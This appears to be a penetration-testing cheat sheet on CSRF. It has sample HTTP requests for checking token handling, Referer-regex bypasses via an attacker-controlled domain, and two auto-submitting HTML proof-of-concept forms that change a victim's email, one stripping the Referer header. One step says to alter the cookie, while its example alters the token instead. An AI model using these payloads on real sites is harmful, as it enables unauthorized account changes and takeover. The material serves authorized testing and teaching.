SameSite Cookie Attribute
The first thing to check in a CSRF attack is the security headers on the session cookie.
No CSRF Token
The most common mistake developers make is not putting a CSRF token.
POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com
POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com
CSRF Token is Being Validated
Check if the CSRF token is being validated by changing a single character in the cookie.
POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA
POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBB
CSRF Token is Being Checked if Parameter not Present
Check if the CSRF token is being checked if there is no CSRF parameter.
POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA
POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com
CSRF Token is Being Checked on Different Methods
Check if the CSRF token is being checked if the method is changed.
POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA
GET /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA
Bad Regex
Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. The following are possible mistakes the developers could make by implementing bad regex for the Referer header based CSRF protection.
1. Bad Regex: Subdomain
https://target.com.shelled.io/change_email
2. Bad Regex: Query Parameter
https://shelled.io/change_email?target.com
Referer Header Removed
Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. The applications may validate the Referer header when it is present in requests but skip the validation if the header is omitted.
The following code will drop the referer header.
<meta name="referrer" content="never">
PoC
<html>
<body>
<meta name="referrer" content="never">
<form action="https://vulnerable-website.com/email/change" method="POST">
<input type="hidden" name="email" value="pwned@evil-user.net" />
<input type="hidden" name="csrf" value="WfF1szMUHhiokx9AHOfjRkE" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
General CSRF PoC
<html>
<body>
<form action="https://vulnerable-website.com/email/change" method="POST">
<input type="hidden" name="email" value="pwned@evil-user.net" />
<input type="hidden" name="csrf" value="WfF1szMUHhiokx9AHOfjRkE" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>